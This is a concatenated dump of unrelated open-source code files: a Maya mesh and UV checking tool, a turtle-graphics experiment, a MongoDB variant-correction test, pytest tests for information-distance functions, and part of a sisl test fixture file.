NTD\", \"Standard deviation normalized texel density\", False) # Standard deviation of NTD distribution\r\n\r\n #self.reset()\r\n \r\n\r\n def reset(self):\r\n \"\"\"Initialize object with default values (reset counters)\r\n \"\"\"\r\n for cond in self.geoConditions:\r\n self.geoConditions[cond].reset()\r\n\r\n for cond in self.uvConditions:\r\n self.uvConditions[cond].reset()\r\n\r\n self.selection = []\r\n\r\n # Global world-space bounding box\r\n self.bbox = [ sys.float_info.max, sys.float_info.max, sys.float_info.max, -sys.float_info.max, -sys.float_info.max, -sys.float_info.max ] # xmin, ymin, zmin, xmax, ymax, zmax\r\n\r\n\r\n # Helper functions for off-line usage\r\n\r\n def writeHeaderCSV(self, file):\r\n \"\"\"Write the CSV header for meshcheck data\r\n\r\n NOTE: This function does not write end-of-line because some data may be concatenated later. End-of-line is responsibility of the caller\r\n\r\n Args:\r\n file (file): CSV file object to write into. The file must have been opened\r\n \"\"\"\r\n header = \"\"\r\n # Add conditions\r\n for c in self.geoConditions:\r\n if header == \"\":\r\n header += \",\"\r\n header += c.name\r\n for c in self.uvConditions:\r\n if header == \"\":\r\n header += \",\"\r\n header += c.name\r\n #header += \",\"+str(len(self.uvTileSet)) # Tiles used (occupied)\r\n # Add bounding box information\r\n header += \",minY,centerX,centerZ\"\r\n file.write(header)\r\n\r\n\r\n def writeDataCSV(self, file):\r\n \"\"\"Write the CSV data for meshcheck data\r\n\r\n NOTE: This function does not write end-of-line because some data may be concatenated later. End-of-line is responsibility of the caller\r\n\r\n Args:\r\n file (_type_): _description_\r\n \"\"\"\r\n data_line = \"\"\r\n # Conditions\r\n for c in self.geoConditions:\r\n if data_line == \"\":\r\n data_line += \",\"\r\n data_line += c.count\r\n for c in self.uvConditions:\r\n if data_line == \"\":\r\n data_line += \",\"\r\n data_line += c.count\r\n #file.write(\",\"+str(len(self.uvTileSet))) # Tiles used\r\n # Bounding box\r\n data_line += \",\"+str(self.bbox[1])\r\n data_line += \",\"+str((self.bbox[0] + self.bbox[3]) / 2.)\r\n data_line += \",\"+str((self.bbox[2] + self.bbox[5]) / 2.)\r\n file.write(data_line)\r\n\r\n def analyze(self):\r\n \"\"\"Analyze the selected objects\r\n \"\"\"\r\n self.reset()\r\n\r\n # Save original selection (just in case we want to restore it)\r\n self.selection = om.MGlobal.getActiveSelectionList() # MSelectionList\r\n\r\n # Fix selection. Select children instead of groups...\r\n selected_nodes = cmds.ls(selection=True)\r\n selected_shapes = cmds.listRelatives(selected_nodes, allDescendents=True, type=\"mesh\", fullPath=True)\r\n\r\n if not selected_shapes:\r\n # Nothing to analyze. 
We're done here\r\n return\r\n\r\n # Select shapes from original selection\r\n cmds.select(selected_shapes, replace=True)\r\n\r\n # Polygon statistics\r\n poly_eval = cmds.polyEvaluate(vertex=True, edge=True, face=True, triangle=True, area=True, worldArea=True, shell=True)\r\n self.geoConditions[\"shells\"].count = poly_eval[\"shell\"]\r\n self.geoConditions[\"vertices\"].count = poly_eval[\"vertex\"]\r\n self.geoConditions[\"edges\"].count = poly_eval[\"edge\"]\r\n self.geoConditions[\"faces\"].count = poly_eval[\"face\"]\r\n\r\n #print(\"POLY EVAL: \", poly_eval)\r\n\r\n for s in selected_shapes:\r\n #stats.history += historySize(s)\r\n\r\n # Grow the collective BB by adding the BB of each element\r\n bbox = cmds.exactWorldBoundingBox(s)\r\n for bi in range(0,3):\r\n if bbox[bi] < self.bbox[bi]:\r\n self.bbox[bi] = bbox[bi]\r\n for bi in range(3,6):\r\n if bbox[bi] > self.bbox[bi]:\r\n self.bbox[bi] = bbox[bi]\r\n\r\n # TO-DO: copy checkers implementation from mayaptools\r\n # Iterate over selected elements\r\n sel = om.MGlobal.getActiveSelectionList() # MSelectionList\r\n\r\n if not sel.length():\r\n om.MGlobal.displayError(\"No selection.\")\r\n return\r\n\r\n # Clear the selection (the analyzers will add offending components to selection)\r\n cmds.select(clear=True)\r\n\r\n print(\"Selected \", sel.length(), \" elements\")\r\n for i in range(0, sel.length()):\r\n # OpenMaya API 2.0\r\n dag = sel.getDagPath(i)\r\n selected_components = sel.getComponent(i)\r\n dag.extendToShape()\r\n\r\n self.__analyzeFaces(dag, selected_components)\r\n\r\n self.__analyzeVertices(dag, selected_components)\r\n\r\n self.__analyzeEdges(dag, selected_components)\r\n\r\n # Restore original selection\r\n om.MGlobal.setActiveSelectionList(self.selection)\r\n\r\n\r\n def __analyzeFaces(self, dag, selected_components):\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # MFnMesh interface\r\n mesh = om.MFnMesh(dag)\r\n\r\n # Report as number of UV sets the maximum number in any mesh\r\n self.uvConditions[\"uvSets\"].count = max(self.uvConditions[\"uvSets\"].count, mesh.numUVSets)\r\n\r\n uv_shell_ids = mesh.getUvShellsIds()\r\n # First field in the array is the number of UV shells\r\n self.uvConditions[\"uvShells\"].count += uv_shell_ids[0]\r\n\r\n # Check UVs\r\n faces = cmds.polyListComponentConversion(dag.getPath(), toFace=True)\r\n\r\n # Overlapping UVs\r\n overlapping_uvs = cmds.polyUVOverlap(faces, oc=True)\r\n if overlapping_uvs:\r\n self.uvConditions[\"uvOverlapping\"].count += len(overlapping_uvs)\r\n # Add overlapping faces to the bad_faces list\r\n for f in overlapping_uvs:\r\n self.uvConditions[\"uvOverlapping\"].elms.append(f)\r\n else:\r\n self.uvConditions[\"uvOverlapping\"].count = 0\r\n\r\n if self.uvConditions[\"uvOverlapping\"].count > 0:\r\n self.uvConditions[\"uvOverlapping\"].errorLevel = ConditionErrorLevel.ERROR\r\n else:\r\n self.uvConditions[\"uvOverlapping\"].errorLevel = ConditionErrorLevel.OK\r\n\r\n # iterate over the selected faces\r\n itFaces = om.MItMeshPolygon(dag, selected_components[1])\r\n\r\n ntd_array = []\r\n while not itFaces.isDone():\r\n\r\n # UVs stuff (EXPERIMENTAL)\r\n if not itFaces.hasUVs() :\r\n self.uvConditions[\"uvMissing\"].count += 1\r\n self.uvConditions[\"uvMissing\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else:\r\n if mesh.isPolygonUVReversed(itFaces.index()):\r\n self.uvConditions[\"uvFlipped\"].count += 1\r\n 
self.uvConditions[\"uvFlipped\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n if itFaces.zeroUVArea() :\r\n # This method is too conservative. Tiny faces are reported as zero area. We'll define our own criteria in min_uv_area\r\n min_uv_area = 1e-8\r\n if itFaces.getUVArea() < min_uv_area:\r\n self.uvConditions[\"uvZeroArea\"].count += 1\r\n self.uvConditions[\"uvZeroArea\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif itFaces.zeroArea():\r\n pass # This avoids division by zero in the code below (else) because ws_area is zero in this case\r\n else:\r\n self.uvConditions[\"uvCoverage\"].count += itFaces.getUVArea()\r\n ws_area = itFaces.getArea(om.MSpace.kWorld)\r\n ts_area = itFaces.getUVArea()\r\n if ws_area != 0:\r\n ntd = ts_area / ws_area # Normalized texel density (texture size in world space)\r\n else:\r\n ntd = 0.\r\n ntd_array.append( ntd )\r\n\r\n uvs = itFaces.getUVs()\r\n if uvs:\r\n the_set = set()\r\n for i in range(len(uvs[0])):\r\n checkUVTile( uvs[0][i], uvs[1][i], the_set )\r\n if len(the_set) > 1:\r\n self.uvConditions[\"uvCrossingBorders\"].count += 1\r\n self.uvConditions[\"uvCrossingBorders\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n # Get points array for this face\r\n point_array = itFaces.getPoints() # MPointArray\r\n vertices_in_face = len(point_array)\r\n # Check vertices in the same position (quads only)\r\n if len(point_array) == 4:\r\n point_set = set() # Empty set\r\n for i in range(0, len(point_array)):\r\n # We accumulate vertex coordinates in a set to automatically remove duplicates\r\n point_coords = ( point_array[i].x, point_array[i].y, point_array[i].z )\r\n point_set.add( point_coords )\r\n\r\n if len(point_set) < 4:\r\n if len(point_set) == 1:\r\n self.geoConditions[\"quadsToPoints\"].count += 1\r\n self.geoConditions[\"quadsToPoints\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n self.geoConditions[\"zeroAreaQuads\"].count += 1\r\n self.geoConditions[\"zeroAreaQuads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif len(point_set) == 2:\r\n self.geoConditions[\"quadsToLines\"].count += 1\r\n self.geoConditions[\"quadsToLines\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n self.geoConditions[\"zeroAreaQuads\"].count += 1\r\n self.geoConditions[\"zeroAreaQuads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else: # 3 different points\r\n self.geoConditions[\"quadsToTris\"].count += 1\r\n self.geoConditions[\"quadsToTris\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n edge_array = itFaces.getEdges() # MIntArray\r\n edges_in_face = len(edge_array)\r\n\r\n if edges_in_face == 3:\r\n self.geoConditions[\"tris\"].count += 1\r\n self.geoConditions[\"tris\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif edges_in_face == 4:\r\n self.geoConditions[\"quads\"].count += 1\r\n self.geoConditions[\"quads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else:\r\n self.geoConditions[\"ngons\"].count += 1\r\n self.geoConditions[\"ngons\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n itFaces.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"tris\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n self.geoConditions[\"ngons\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n 
self.geoConditions[\"quadsToPoints\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"quadsToLines\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"quadsToTris\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"zeroAreaQuads\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvOverlapping\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvMissing\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvFlipped\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvZeroArea\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvCrossingBorders\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n if self.uvConditions[\"uvCoverage\"].count < .25:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.ERROR\r\n elif self.uvConditions[\"uvCoverage\"].count < .25:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.WARN\r\n else:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.OK\r\n\r\n # Compute texel density statistics\r\n if ( len(ntd_array) ):\r\n self.uvConditions[\"avgNTD\"].count = sum(ntd_array) / len(ntd_array)\r\n self.uvConditions[\"minNTD\"].count = min(ntd_array)\r\n self.uvConditions[\"maxNTD\"].count = max(ntd_array)\r\n self.uvConditions[\"varianceNTD\"].count = sum((x-self.uvConditions[\"avgNTD\"].count)**2 for x in ntd_array) / len(ntd_array)\r\n self.uvConditions[\"stdDevNTD\"].count = self.uvConditions[\"varianceNTD\"].count**0.5\r\n\r\n\r\n def __analyzeVertices(self, dag, selected_components):\r\n\r\n cmds.select(cmds.polyListComponentConversion(toVertex=True))\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # iterate over the selected verts\r\n itVerts = om.MItMeshVertex(dag, selected_components[1])\r\n\r\n while not itVerts.isDone():\r\n valence = itVerts.numConnectedEdges()\r\n\r\n if valence != 4:\r\n self.geoConditions[\"poles\"].count += 1\r\n self.geoConditions[\"poles\"].elms.append(dag.fullPathName()+\".vtx[\"+str(itVerts.index())+\"]\")\r\n\r\n itVerts.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"poles\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n\r\n\r\n def __analyzeEdges(self, dag, selected_components):\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # iterate over the selected edges\r\n itEdges = om.MItMeshEdge(dag, selected_components[1])\r\n\r\n while not itEdges.isDone():\r\n \r\n num_faces = itEdges.numConnectedFaces()\r\n \r\n if ( num_faces == 1 ):\r\n self.geoConditions[\"borderEdges\"].count += 1\r\n self.geoConditions[\"borderEdges\"].elms.append(dag.fullPathName()+\".e[\"+str(itEdges.index())+\"]\")\r\n elif ( num_faces > 2 ):\r\n self.geoConditions[\"evilEdges\"].count += 1\r\n self.geoConditions[\"evilEdges\"].elms.append(dag.fullPathName()+\".e[\"+str(itEdges.index())+\"]\")\r\n \r\n itEdges.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"borderEdges\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n 
self.geoConditions[\"evilEdges\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n","repo_name":"jtaibo/TallerCreacionTools","sub_path":"maya/python/tlc/modeling/meshcheck.py","file_name":"meshcheck.py","file_ext":"py","file_size_in_byte":22495,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"2510406370","text":"import turtle\n# Movement experiment\n\nscreen = turtle.Screen()\nscreen.setup(width=500,height=400)\nscreen.bgcolor(\"white\")\n\n\nb = turtle.Turtle()\nb.shape(\"circle\")\nb.dx = 0.1\nb.dy = -0.1\nt = 1\nwhile True:\n t += 1\n b.sety((b.ycor()+(b.dy*t))/2)\n b.setx(b.xcor()+(b.dx*t)/2)\n print (t)\nturtle.done()\n","repo_name":"bermudez05/Ping-pong-Game","sub_path":"Movement experiment (accelerate).py","file_name":"Movement experiment (accelerate).py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34869651076","text":"from unittest import TestCase\n\nfrom ebi_eva_common_pyutils.mongodb import MongoDatabase\n\nfrom tasks.eva_2155.correct_contig_error_in_study import correct\nimport logging\n\n\nclass TestCorrectContigErrorInStudy(TestCase):\n def setUp(self) -> None:\n self.contig = \"AF010406.1\"\n self.db = \"eva_accession_sharded_test\"\n self.collection = \"submittedVariantEntity\"\n self.uri = \"mongodb://localhost:27017/\"\n self.mongo_source = MongoDatabase(uri=self.uri, db_name=self.db)\n wrong_contig = [{\n \"_id\": \"8C4E490E82B895ADE3B9405204771B9E6BDCB286\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB33693\",\n \"contig\": \"-\",\n \"start\": 16410,\n \"ref\": \"G\",\n \"alt\": \"A\",\n \"accession\": 7121896076,\n \"version\": 1,\n \"createdDate\": \"2020-05-05T10:38:43.367Z\"\n },\n {\n \"_id\": \"7350E3A0B0242791BD25901F15D22467DC7939BD\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB33693\",\n \"contig\": \"OARMT\",\n \"start\": 16410,\n \"ref\": \"G\",\n \"alt\": \"A\",\n \"accession\": 7121824383,\n \"version\": 1,\n \"createdDate\": \"2020-04-28T00:26:01.844Z\"\n },\n {\n \"_id\": \"C9618202A2AF568A94259A1A16AB0A67DCC1CC94\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB23437\",\n \"contig\": \"CM001582.1\",\n \"start\": 5442343,\n \"ref\": \"C\",\n \"alt\": \"T\",\n \"accession\": 5264373293,\n \"version\": 1,\n \"createdDate\": \"2019-07-07T11:14:13.110Z\"\n }\n\n ]\n\n self.mongo_source.mongo_handle[self.db][self.collection].drop()\n self.mongo_source.mongo_handle[self.db][self.collection].insert_many(wrong_contig)\n\n def tearDown(self) -> None:\n self.mongo_source.mongo_handle[self.db][self.collection].drop()\n self.mongo_source.mongo_handle.close()\n\n def test_correct(self):\n fixed = correct(self.mongo_source)\n self.assertEqual(fixed, (1, 1))\n updated_variant = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'seq': 'GCA_000298735.1', 'accession': 7121896076}))\n self.assertEqual(updated_variant['contig'], self.contig)\n self.assertEqual(updated_variant['_id'], '2FE89DBEFF0FB8CB4A544070042101916C9BA0A4')\n \n variant_with_hyphen = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': '8C4E490E82B895ADE3B9405204771B9E6BDCB286'}))\n self.assertIsNone(variant_with_hyphen)\n \n variant_with_OARMT = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': '7350E3A0B0242791BD25901F15D22467DC7939BD'}))\n self.assertIsNone(variant_with_OARMT)\n 
\n variant_to_keep = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': 'C9618202A2AF568A94259A1A16AB0A67DCC1CC94'}))\n self.assertIsNotNone(variant_to_keep)\n\n self.assertEqual(self.mongo_source.mongo_handle[self.db][self.collection].count(), 2)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2155/test/test_correct_contig_error.py","file_name":"test_correct_contig_error.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26025493354","text":"import pytest\nimport numpy as np\nimport quafing\nfrom scipy.stats import norm\n\n#Test Dimensionality other than 1d and nd\ndef test_wrong_dims_kl(): \n with pytest.raises(RuntimeError):\n quafing.distance.kl_divergence_distance._choose_sym_kl_div_func(dim='3d')\n\ndef test_wrong_dims_cos(): \n with pytest.raises(RuntimeError):\n quafing.distance.cosine_distance._choose_cosine_func(dim='3d')\n\ndef test_wrong_dims_hd(): \n with pytest.raises(RuntimeError):\n quafing.distance.hellinger_distance._choose_hellinger_func(dim='3d')\n\n#Test nd \"NotImplementedError\" until implemented - TO BE CHANGED AFTER IMPLEMENTATION\ndef test_sym_kl_div_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.kl_divergence_distance.sym_kl_div_nd()\n\ndef test_cosine_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.cosine_distance.cosine_nd(is_discrete=True)\n with pytest.raises(NotImplementedError):\n quafing.distance.cosine_distance.cosine_nd(is_discrete=False)\n\ndef test_hellinger_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.hellinger_distance.hellinger_nd(is_discrete=True)\n with pytest.raises(NotImplementedError):\n quafing.distance.hellinger_distance.hellinger_nd(is_discrete=False)\n\n#Test discrete calculations in 1d\ndef test_discrete_kl_div_1d_isinf_with_2nd_smaller_pdf():\n with pytest.warns(RuntimeWarning):\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n assert np.isposinf(quafing.distance.kl_divergence_distance.sym_kl_div_1d(p1, p2, is_discrete=True))\n\ndef test_discrete_kl_zero_if_equal():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.kl_divergence_distance.sym_kl_div_1d(p1, p2, is_discrete=True),0.)\n\ndef test_discrete_cosine_1d():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.cosine_distance.cosine_1d(p1, p2, is_discrete=True), 0.)\n\ndef test_discrete_hellinger_1d_is_zero_ifequal():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.hellinger_distance.hellinger_1d(p1, p2, is_discrete=True), 0.)\n\ndef test_discrete_hellinger_is_symmetric():\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n assert np.isclose(quafing.distance.hellinger_distance.hellinger_1d(p1, p2, is_discrete=True), quafing.distance.hellinger_distance.hellinger_1d(p2, p1, is_discrete=True))\n\n#Test continuous distance calculation in 1D\ndef test_continuous_kl_converges_to_analytic_result():\n s1 = 1.0\n s2 = 2.0\n m1 = 1\n m2 = 1\n p1 = norm.freeze(loc=m1, scale=s1).pdf\n p2 = norm.freeze(loc=m2, scale=s2).pdf\n kl_dist = quafing.distance.kl_divergence_distance.continuous_kl_div_1d(p1, p2, base=None)\n analytic = np.log(s2/s1) + (s1**2 + (m1-m2)**2) / (2 * s2**2) - 0.5\n # On my machine relative error around 1e-16\n assert np.isclose(kl_dist, analytic)\n\ndef 
test_continuous_hellinger_converges_to_analytic_result():\n s1 = 1.0\n s2 = 2.0\n m1 = 1\n m2 = 1\n p1 = norm.freeze(loc=m1, scale=s1).pdf\n p2 = norm.freeze(loc=m2, scale=s2).pdf\n hell_dist = quafing.distance.hellinger_distance.continuous_hellinger_1d(p1, p2)\n analytic = (1 - np.sqrt((2*s1*s2)/(s1**2+s2**2)) * np.exp(-0.25*((m1-m2)**2)/(s1**2+s2**2)))\n analytic = np.sqrt(2 * analytic)\n # On my machine relative error around 1e-16\n assert np.isclose(hell_dist, analytic)\n\ndef test_get_ID_measure():\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7} \n with pytest.raises(RuntimeError, match=r'specification of information distance measure required'):\n quafing.distance.information_distance.information_distance(p1,p2,method=None)\n with pytest.raises(RuntimeError, match=r'specifiation of piecewise distance aggregation function required'):\n quafing.distance.information_distance.information_distance(p1,p2,method='kl',pwdist=None)\n\ndef test_check_distance_measure_method():\n with pytest.raises(NotImplementedError):\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n quafing.distance.information_distance.information_distance(p1,p2,method='None',pwdist='avg')\n\ndef test_validate_input():\n with pytest.raises(RuntimeError):\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = list({1: 0.2, 2: 0.1, 4: 0.7})\n quafing.distance.information_distance.information_distance(p1,p2,method='kl',pwdist='avg')","repo_name":"SDCCA/quafing","sub_path":"tests/test_distance.py","file_name":"test_distance.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4255285694","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\" Global sisl fixtures \"\"\"\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom sisl import Atom, Geometry, Hamiltonian, Lattice, _environ\n\n# Here we create the necessary methods and fixtures to enabled/disable\n# tests depending on whether a sisl-files directory is present.\n\n\n# Modify items based on whether the env is correct or not\ndef pytest_collection_modifyitems(config, items):\n sisl_files_tests = _environ.get_environ_variable(\"SISL_FILES_TESTS\")\n if sisl_files_tests.is_dir():\n if (sisl_files_tests / \"sisl\").is_dir():\n return\n print(f\"pytest-sisl: Could not locate sisl directory in: {sisl_files_tests}\")\n return\n\n xfail_sisl_files = pytest.mark.xfail(\n run=False,\n reason=\"requires env(SISL_FILES_TESTS) pointing to clone of: https://github.com/zerothi/sisl-files\",\n )\n for item in items:\n # Only skip those that have the sisl_files fixture\n # GLOBAL skipping of ALL tests that don't have this fixture\n if \"sisl_files\" in item.fixturenames:\n item.add_marker(xfail_sisl_files)\n\n\n@pytest.fixture(scope=\"function\")\ndef sisl_tmp(request, tmp_path_factory):\n \"\"\"sisl specific temporary file and directory creator.\n\n sisl_tmp(file, dir_name='sisl')\n sisl_tmp.file(file, dir_name='sisl')\n sisl_tmp.dir('sisl')\n\n The scope of the `sisl_tmp` fixture is at a function level to\n clean up after each function.\n \"\"\"\n\n class FileFactory:\n def __init__(self):\n self.base = tmp_path_factory.getbasetemp()\n self.dirs = [self.base]\n self.files = []\n\n def dir(self, name=\"sisl\"):\n # Make name a path\n D = Path(name.replace(os.path.sep, \"-\"))\n if not (self.base / D).is_dir():\n # tmp_path_factory.mktemp returns pathlib.Path\n self.dirs.append(tmp_path_factory.mktemp(str(D), numbered=False))\n\n return self.dirs[-1]\n\n def file(self, name, dir_name=\"sisl\"):\n # self.base *is* a pathlib\n D = self.base / dir_name.replace(os.path.sep, \"-\")\n if D in self.dirs:\n i = self.dirs.index(D)\n else:\n self.dir(dir_name)\n i = -1\n self.files.append(self.dirs[i] / name)\n return str(self.files[-1])\n\n def getbase(self):\n return self.dirs[-1]\n\n def __call__(self, name, dir_name=\"sisl\"):\n \"\"\"Shorthand for self.file\"\"\"\n return self.file(name, dir_name)\n\n def teardown(self):\n while len(self.files) > 0:\n # Do each removal separately\n f = self.files.pop()\n if f.is_file():\n try:\n f.close()\n except Exception:\n pass\n try:\n f.unlink()\n except Exception:\n pass\n while len(self.dirs) > 0:\n # Do each removal separately (from back of directory)\n d = self.dirs.pop()\n if d.is_dir():\n try:\n d.rmdir()\n except Exception:\n pass\n\n ff = FileFactory()\n request.addfinalizer(ff.teardown)\n return ff\n\n\n@pytest.fixture(scope=\"session\")\ndef sisl_files():\n \"\"\"Environment catcher for the large files hosted in a different repository.\n\n If SISL_FILES_TESTS has been defined in the environment variable the directory\n will be used for the tests with this as a fixture.\n\n If the environment variable is empty and a test has this fixture, it will\n be skipped.\n \"\"\"\n sisl_files_tests = _environ.get_environ_variable(\"SISL_FILES_TESTS\")\n if not sisl_files_tests.is_dir():\n\n def _path(*files):\n pytest.xfail(\n reason=f\"Environment SISL_FILES_TESTS not pointing to a valid directory.\",\n run=False,\n )\n\n return _path\n\n def _path(*files):\n p = sisl_files_tests.joinpath(*files)\n if 
p.exists():\n return p\n # I expect this test to fail due to the wrong environment.\n # But it isn't an actual fail since it hasn't runned...\n pytest.xfail(\n reason=f\"Environment SISL_FILES_TESTS may point to a wrong path(?); file {p} not found\",\n run=False,\n )\n\n return _path\n\n\n@pytest.fixture(scope=\"session\")\ndef sisl_system():\n \"\"\"A preset list of geometries/Hamiltonians.\"\"\"\n\n class System:\n pass\n\n d = System()\n\n alat = 1.42\n sq3h = 3.0**0.5 * 0.5\n C = Atom(Z=6, R=1.42)\n lattice = Lattice(\n np.array([[1.5, sq3h, 0.0], [1.5, -sq3h, 0.0], [0.0, 0.0, 10.0]], np.float64)\n * alat,\n nsc=[3, 3, 1],\n )\n d.g = Geometry(\n np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]], np.float64) * alat,\n atoms=C,\n lattice=lattice,\n )\n\n d.R = np.array([0.1, 1.5])\n d.t = np.array([0.0, 2.7])\n d.tS = np.array([(0.0, 1.0), (2.7, 0.0)])\n d.C = Atom(Z=6, R=max(d.R))\n d.lattice = Lattice(\n np.array([[1.5, sq3h, 0.0], [1.5, -sq3h, 0.0], [0.0, 0.0, 10.0]], np.float64)\n * alat,\n nsc=[3, 3, 1],\n )\n d.gtb = Geometry(\n np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]], np.float64) * alat,\n atoms=C,\n lattice=lattice,\n )\n\n d.ham = Hamiltonian(d.gtb)\n d.ham.construct([(0.1, 1.5), (0.1, 2.7)])\n return d\n\n\n# We are ignoring stuff in sisl.viz.plotly if plotly cannot be imported\n# collect - ignore seems not to fully work... I should report this upstream.\n# however, the pytest_ignore_collect seems very stable and favourable\ncollect_ignore = [\"setup.py\"]\ncollect_ignore_glob = []\n\n# skip paths\n_skip_paths = []\ntry:\n import plotly\nexcept ImportError:\n _skip_paths.append(os.path.join(\"sisl\", \"viz\", \"plotly\"))\n\n\ndef pytest_ignore_collect(path, config):\n # ensure we only compare against final *sisl* stuff\n global _skip_paths\n parts = list(Path(path).parts)\n parts.reverse()\n sisl_parts = parts[: parts.index(\"sisl\")]\n sisl_parts.reverse()\n sisl_path = str(Path(\"sisl\").joinpath(*sisl_parts))\n\n for skip_path in _skip_paths:\n if skip_path in sisl_path:\n return True\n return False\n\n\ndef pytest_configure(config):\n pytest.sisl_travis_skip = pytest.mark.skipif(\n os.environ.get(\"SISL_TRAVIS_CI\", \"false\").lower() == \"true\",\n reason=\"running on TRAVIS\",\n )\n\n # Locally manage pytest.ini input\n for mark in [\n \"io\",\n \"generic\",\n \"bloch\",\n \"hamiltonian\",\n \"geometry\",\n \"geom\",\n \"shape\",\n \"state\",\n \"electron\",\n \"phonon\",\n \"utils\",\n \"unit\",\n \"distribution\",\n \"spin\",\n \"self_energy\",\n \"help\",\n \"messages\",\n \"namedindex\",\n \"sparse\",\n \"lattice\",\n \"supercell\",\n \"sc\",\n \"quaternion\",\n \"sparse_geometry\",\n \"sparse_orbital\",\n \"ranges\",\n \"physics\",\n \"physics_feature\",\n \"orbital\",\n \"oplist\",\n \"grid\",\n \"atoms\",\n \"atom\",\n 